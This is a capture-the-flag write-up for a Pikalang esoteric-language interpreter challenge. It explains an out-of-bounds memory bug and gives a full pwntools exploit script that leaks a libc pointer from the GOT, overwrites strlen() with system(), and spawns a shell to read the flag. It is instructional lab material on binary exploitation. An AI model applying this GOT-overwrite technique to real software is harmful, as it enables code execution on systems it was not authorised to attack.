Background
“Pikalang is a joke esoteric programming language created by Blake Grotewold. It is identical to Brainf*ck, except that the instructions are changed into the sounds made by Pikachu from Pokémon. It is one of the many trivial Brainf*ck command substitutions. As such, it is a member of the TrivialBrainf*ckSubstitution family of programming languages. “
Tokens are as follows…
Brainf*ck | Pikalang | Description |
---|---|---|
> | pipi | Move the pointer to the right |
< | pichu | Move the pointer to the left |
+ | pi | Increment the memory cell under the pointer |
– | ka | Decrement the memory cell under the pointer |
. | pikachu | Output the character signified by the cell at the pointer |
, | pikapi | Input a character and store it in the cell at the pointer |
[ | pika | Jump past the matching chu if the cell under the pointer is 0 |
] | chu | Jump back to the matching pika |
For instance, the following code prints "Hello world"
pi pi pi pi pi pi pi pi pi pi pika pipi pi pi pi pi pi pi pi pipi pi pi
pi pi pi pi pi pi pi pi pipi pi pi pi pipi pi pichu pichu pichu pichu ka
chu pipi pi pi pikachu pipi pi pikachu pi pi pi pi pi pi pi pikachu
pikachu pi pi pi pikachu pipi pi pi pikachu pichu pichu pi pi pi pi pi
pi pi pi pi pi pi pi pi pi pi pikachu pipi pikachu pi pi pi pikachu ka
ka ka ka ka ka pikachu ka ka ka ka ka ka ka ka pikachu pipi pi pikachu
pipi pikachu
More information: (https://esolangs.org/wiki/Pikalang)
Challenge Description
This program implements a simple Pikalang interpreter. However the memory tape is stored as a fixed-size global array. This allows the Pikalang program to simply walk out of bounds with the pipi (move right)
and pichu (move left)
operators. Arbitrary memory contents can then be leaked with the pikachu (output)
operator, and then altered with the pi (increment)
, ka (decrement)
, and pikapi (input)
operators. This allows read/write access to the entire program’s memory space.
There are likely many different exploitation methods, but the simplest is to alter pointers in the global offset table (GOT). This program is compiled with Partial RELRO, meaning that the GOT is writable at run time. By altering these pointers, we can cause arbitrary functions to be called when libc functions are invoked.
When each Pikalang program is first read in, its length is checked with the strlen()
function. Both strlen()
and system()
accept a single character pointer as their first argument, meaning that if we can overwrite the strlen()
GOT entry with a pointer to system()
, then the next Pikalang program we enter will instead be run as a system command.
Our exploitation method then is, roughly…
- Seek backwards into the GOT, and leak each byte of a libc function (we choose
puts()
in our reference exploit). - Use the leaked pointer with the included
libc.so.6
file to calculate the libc base address, andsystem()
address. - Seek backwards into the GOT, and alter each byte of the
strlen()
pointer to instead point tosystem()
. - Finally, send the string
"/bin/sh"
as our next Pikalang program, which will be run bysystem()
, giving us a shell.
Exploit Script
import sys
from pwn import *
TOK_GOR = "pipi"
TOK_GOL = "pichu"
TOK_INC = "pi"
TOK_DEC = "ka"
TOK_OUT = "pikachu"
TOK_INP = "pikapi"
TOK_JFW = "pika"
TOK_JBK = "chu"
CMD = "/bin/sh"
if len(sys.argv) < 2:
print(f"Usage {sys.argv[0]} <local|remote> [host] [port]")
exit(0)
elif sys.argv[1] == "local":
p = process("./pikalang.bin")
elif sys.argv[1] == "remote":
p = remote(sys.argv[2], sys.argv[3])
# Find necessary pointers and offsets
bin = ELF("./pikalang.bin")
libc = ELF("./libc.so.6")
OFFSET_STRLEN = libc.symbols["strlen"]
OFFSET_PUTS = libc.symbols["puts"]
OFFSET_SYSTEM = libc.symbols["system"]
DATA_TAPE = bin.symbols["tape"]
GOT_PUTS = bin.got["puts"]
GOT_STRLEN = bin.got["strlen"]
# Consume initial message
p.readuntil(b"quit):\n")
# Seek tape pointer backwards to puts@GOT
for i in range(0, (DATA_TAPE - GOT_PUTS)):
p.send(f"{TOK_GOL} ".encode())
# Leak puts@GOT pointer to calculate libc location
for i in range(0, 8):
p.send(f"{TOK_OUT} {TOK_GOR} ".encode())
# Complete operation
p.send(b"\n")
leak = u64(p.read(8))
libc_base = leak - OFFSET_PUTS
libc_system = libc_base + OFFSET_SYSTEM
print(f"Leaked puts@GOT: {leak:x}")
print(f"Libc base: {libc_base:x}")
print(f"Libc system(): {libc_system:x}")
# Consume initial message
p.readuntil(b"quit):\n")
# Seek tape pointer backwards to strlen@GOT
for i in range(0, (DATA_TAPE - GOT_STRLEN)):
p.send(f"{TOK_GOL} ".encode())
# Leak each byte in the strlen pointer
for i in range(0, 8):
p.send(f"{TOK_OUT} {TOK_GOR} ".encode())
# Complete operation
p.send(b"\n")
strlen_ptr = p.read(8)
strlen_int = u64(strlen_ptr)
print(f"Leaked strlen(): {strlen_int:x}")
# Consume initial message
p.readuntil(b"quit):\n")
# Seek tape pointer backwards to strlen@GOT again
for i in range(0, (DATA_TAPE - GOT_STRLEN)):
p.send(f"{TOK_GOL} ".encode())
# For each byte in the strlen pointer, inc/dec it as necessary
# in order to turn strlen() into system()
for i in range(0, 8):
curr = u8(strlen_ptr[i:i+1])
need = (libc_system >> (i*8)) & 0xff
print(f"Byte {i}: curr=0x{curr:02x} need=0x{need:02x} ... ", end="")
if curr > need:
print(f"decrementing by 0x{(curr-need):02x}")
for j in range(0, (curr-need)):
p.send(f"{TOK_DEC} ".encode())
elif curr < need:
print(f"incrementing by 0x{(need-curr):02x}")
for j in range(0, (need-curr)):
p.send(f"{TOK_INC} ".encode())
else:
print(f"already correct")
p.send(f"{TOK_GOR} ".encode())
# Complete Operation
p.send(b"\n")
print("Overwrote strlen() pointer with system() pointer")
# Consume initial message
p.readuntil(b"quit):\n")
print("Triggering command!")
# Trigger the command!
p.send(f"{CMD}\n".encode())
p.sendline(b"id")
p.sendline(b"cat flag.txt")
p.interactive()
Notes
In testing, pwntools seemed to report an invalid offset for elf.symbols["strlen"]
. As such, the puts()
pointer is used to achieve the libc base address leak. In principle either should work though.
Also, this exploit is likely more complicated than necessary, as it uses the increment/decrement operators to alter the pointer, as opposed to simply writing those bytes. Just the way it was written in the moment. A shorter exploit is certainly possible.
Alternative (untested) exploitation methods might include…
- Overwriting a GOT entry with a libc one-gadget address.
- Somehow leaking a stack pointer, shifting the tape head to the stack, and writing a ROP chain.
- Shifting the tape head into the heap and performing any number of heap exploitation tricks.